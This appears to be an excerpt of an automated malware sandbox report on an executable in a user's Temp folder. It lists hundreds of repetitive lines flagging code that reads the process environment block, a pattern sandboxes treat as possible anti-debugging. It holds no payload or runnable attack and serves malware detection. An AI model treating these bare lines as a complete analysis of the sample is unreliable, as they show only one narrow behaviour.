Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A2C3 mov eax, dword ptr fs:[00000030h]	11_2_2117A2C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A2C3 mov eax, dword ptr fs:[00000030h]	11_2_2117A2C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A2C3 mov eax, dword ptr fs:[00000030h]	11_2_2117A2C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A2C3 mov eax, dword ptr fs:[00000030h]	11_2_2117A2C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212462D6 mov eax, dword ptr fs:[00000030h]	11_2_212462D6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211802E1 mov eax, dword ptr fs:[00000030h]	11_2_211802E1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211802E1 mov eax, dword ptr fs:[00000030h]	11_2_211802E1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211802E1 mov eax, dword ptr fs:[00000030h]	11_2_211802E1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206500 mov eax, dword ptr fs:[00000030h]	11_2_21206500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244500 mov eax, dword ptr fs:[00000030h]	11_2_21244500
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E53E mov eax, dword ptr fs:[00000030h]	11_2_2119E53E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E53E mov eax, dword ptr fs:[00000030h]	11_2_2119E53E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E53E mov eax, dword ptr fs:[00000030h]	11_2_2119E53E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E53E mov eax, dword ptr fs:[00000030h]	11_2_2119E53E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E53E mov eax, dword ptr fs:[00000030h]	11_2_2119E53E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535 mov eax, dword ptr fs:[00000030h]	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178550 mov eax, dword ptr fs:[00000030h]	11_2_21178550
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178550 mov eax, dword ptr fs:[00000030h]	11_2_21178550
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A656A mov eax, dword ptr fs:[00000030h]	11_2_211A656A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A656A mov eax, dword ptr fs:[00000030h]	11_2_211A656A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A656A mov eax, dword ptr fs:[00000030h]	11_2_211A656A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE59C mov eax, dword ptr fs:[00000030h]	11_2_211AE59C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A4588 mov eax, dword ptr fs:[00000030h]	11_2_211A4588
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21172582 mov eax, dword ptr fs:[00000030h]	11_2_21172582
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21172582 mov ecx, dword ptr fs:[00000030h]	11_2_21172582
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211945B1 mov eax, dword ptr fs:[00000030h]	11_2_211945B1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211945B1 mov eax, dword ptr fs:[00000030h]	11_2_211945B1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F05A7 mov eax, dword ptr fs:[00000030h]	11_2_211F05A7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F05A7 mov eax, dword ptr fs:[00000030h]	11_2_211F05A7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F05A7 mov eax, dword ptr fs:[00000030h]	11_2_211F05A7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211765D0 mov eax, dword ptr fs:[00000030h]	11_2_211765D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA5D0 mov eax, dword ptr fs:[00000030h]	11_2_211AA5D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA5D0 mov eax, dword ptr fs:[00000030h]	11_2_211AA5D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE5CF mov eax, dword ptr fs:[00000030h]	11_2_211AE5CF
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE5CF mov eax, dword ptr fs:[00000030h]	11_2_211AE5CF
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211725E0 mov eax, dword ptr fs:[00000030h]	11_2_211725E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC5ED mov eax, dword ptr fs:[00000030h]	11_2_211AC5ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC5ED mov eax, dword ptr fs:[00000030h]	11_2_211AC5ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E5E7 mov eax, dword ptr fs:[00000030h]	11_2_2119E5E7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A8402 mov eax, dword ptr fs:[00000030h]	11_2_211A8402
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A8402 mov eax, dword ptr fs:[00000030h]	11_2_211A8402
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A8402 mov eax, dword ptr fs:[00000030h]	11_2_211A8402
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA430 mov eax, dword ptr fs:[00000030h]	11_2_211AA430
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116C427 mov eax, dword ptr fs:[00000030h]	11_2_2116C427
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E420 mov eax, dword ptr fs:[00000030h]	11_2_2116E420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E420 mov eax, dword ptr fs:[00000030h]	11_2_2116E420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E420 mov eax, dword ptr fs:[00000030h]	11_2_2116E420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6420 mov eax, dword ptr fs:[00000030h]	11_2_211F6420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119245A mov eax, dword ptr fs:[00000030h]	11_2_2119245A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116645D mov eax, dword ptr fs:[00000030h]	11_2_2116645D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE443 mov eax, dword ptr fs:[00000030h]	11_2_211AE443
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119A470 mov eax, dword ptr fs:[00000030h]	11_2_2119A470
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119A470 mov eax, dword ptr fs:[00000030h]	11_2_2119A470
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119A470 mov eax, dword ptr fs:[00000030h]	11_2_2119A470
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122A456 mov eax, dword ptr fs:[00000030h]	11_2_2122A456
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FC460 mov ecx, dword ptr fs:[00000030h]	11_2_211FC460
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A44B0 mov ecx, dword ptr fs:[00000030h]	11_2_211A44B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FA4B0 mov eax, dword ptr fs:[00000030h]	11_2_211FA4B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122A49A mov eax, dword ptr fs:[00000030h]	11_2_2122A49A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211764AB mov eax, dword ptr fs:[00000030h]	11_2_211764AB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211704E5 mov ecx, dword ptr fs:[00000030h]	11_2_211704E5
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170710 mov eax, dword ptr fs:[00000030h]	11_2_21170710
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A0710 mov eax, dword ptr fs:[00000030h]	11_2_211A0710
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC700 mov eax, dword ptr fs:[00000030h]	11_2_211AC700
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A273C mov eax, dword ptr fs:[00000030h]	11_2_211A273C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A273C mov ecx, dword ptr fs:[00000030h]	11_2_211A273C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A273C mov eax, dword ptr fs:[00000030h]	11_2_211A273C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EC730 mov eax, dword ptr fs:[00000030h]	11_2_211EC730
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC720 mov eax, dword ptr fs:[00000030h]	11_2_211AC720
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC720 mov eax, dword ptr fs:[00000030h]	11_2_211AC720
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FE75D mov eax, dword ptr fs:[00000030h]	11_2_211FE75D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170750 mov eax, dword ptr fs:[00000030h]	11_2_21170750
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F4755 mov eax, dword ptr fs:[00000030h]	11_2_211F4755
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2750 mov eax, dword ptr fs:[00000030h]	11_2_211B2750
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2750 mov eax, dword ptr fs:[00000030h]	11_2_211B2750
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A674D mov esi, dword ptr fs:[00000030h]	11_2_211A674D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A674D mov eax, dword ptr fs:[00000030h]	11_2_211A674D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A674D mov eax, dword ptr fs:[00000030h]	11_2_211A674D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178770 mov eax, dword ptr fs:[00000030h]	11_2_21178770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770 mov eax, dword ptr fs:[00000030h]	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212247A0 mov eax, dword ptr fs:[00000030h]	11_2_212247A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121678E mov eax, dword ptr fs:[00000030h]	11_2_2121678E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211707AF mov eax, dword ptr fs:[00000030h]	11_2_211707AF
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117C7C0 mov eax, dword ptr fs:[00000030h]	11_2_2117C7C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F07C3 mov eax, dword ptr fs:[00000030h]	11_2_211F07C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211747FB mov eax, dword ptr fs:[00000030h]	11_2_211747FB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211747FB mov eax, dword ptr fs:[00000030h]	11_2_211747FB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211927ED mov eax, dword ptr fs:[00000030h]	11_2_211927ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211927ED mov eax, dword ptr fs:[00000030h]	11_2_211927ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211927ED mov eax, dword ptr fs:[00000030h]	11_2_211927ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FE7E1 mov eax, dword ptr fs:[00000030h]	11_2_211FE7E1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2619 mov eax, dword ptr fs:[00000030h]	11_2_211B2619
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118260B mov eax, dword ptr fs:[00000030h]	11_2_2118260B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE609 mov eax, dword ptr fs:[00000030h]	11_2_211EE609
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A6620 mov eax, dword ptr fs:[00000030h]	11_2_211A6620
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A8620 mov eax, dword ptr fs:[00000030h]	11_2_211A8620
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117262C mov eax, dword ptr fs:[00000030h]	11_2_2117262C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E627 mov eax, dword ptr fs:[00000030h]	11_2_2118E627
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123866E mov eax, dword ptr fs:[00000030h]	11_2_2123866E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123866E mov eax, dword ptr fs:[00000030h]	11_2_2123866E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118C640 mov eax, dword ptr fs:[00000030h]	11_2_2118C640
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A2674 mov eax, dword ptr fs:[00000030h]	11_2_211A2674
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA660 mov eax, dword ptr fs:[00000030h]	11_2_211AA660
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA660 mov eax, dword ptr fs:[00000030h]	11_2_211AA660
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174690 mov eax, dword ptr fs:[00000030h]	11_2_21174690
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174690 mov eax, dword ptr fs:[00000030h]	11_2_21174690
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A66B0 mov eax, dword ptr fs:[00000030h]	11_2_211A66B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC6A6 mov eax, dword ptr fs:[00000030h]	11_2_211AC6A6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA6C7 mov ebx, dword ptr fs:[00000030h]	11_2_211AA6C7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA6C7 mov eax, dword ptr fs:[00000030h]	11_2_211AA6C7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE6F2 mov eax, dword ptr fs:[00000030h]	11_2_211EE6F2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE6F2 mov eax, dword ptr fs:[00000030h]	11_2_211EE6F2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE6F2 mov eax, dword ptr fs:[00000030h]	11_2_211EE6F2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE6F2 mov eax, dword ptr fs:[00000030h]	11_2_211EE6F2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F06F1 mov eax, dword ptr fs:[00000030h]	11_2_211F06F1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F06F1 mov eax, dword ptr fs:[00000030h]	11_2_211F06F1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2120892B mov eax, dword ptr fs:[00000030h]	11_2_2120892B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FC912 mov eax, dword ptr fs:[00000030h]	11_2_211FC912
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168918 mov eax, dword ptr fs:[00000030h]	11_2_21168918
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168918 mov eax, dword ptr fs:[00000030h]	11_2_21168918
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE908 mov eax, dword ptr fs:[00000030h]	11_2_211EE908
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE908 mov eax, dword ptr fs:[00000030h]	11_2_211EE908
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F892A mov eax, dword ptr fs:[00000030h]	11_2_211F892A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F0946 mov eax, dword ptr fs:[00000030h]	11_2_211F0946
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21214978 mov eax, dword ptr fs:[00000030h]	11_2_21214978
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21214978 mov eax, dword ptr fs:[00000030h]	11_2_21214978
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FC97C mov eax, dword ptr fs:[00000030h]	11_2_211FC97C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244940 mov eax, dword ptr fs:[00000030h]	11_2_21244940
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B096E mov eax, dword ptr fs:[00000030h]	11_2_211B096E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B096E mov edx, dword ptr fs:[00000030h]	11_2_211B096E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B096E mov eax, dword ptr fs:[00000030h]	11_2_211B096E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21196962 mov eax, dword ptr fs:[00000030h]	11_2_21196962
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21196962 mov eax, dword ptr fs:[00000030h]	11_2_21196962
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21196962 mov eax, dword ptr fs:[00000030h]	11_2_21196962
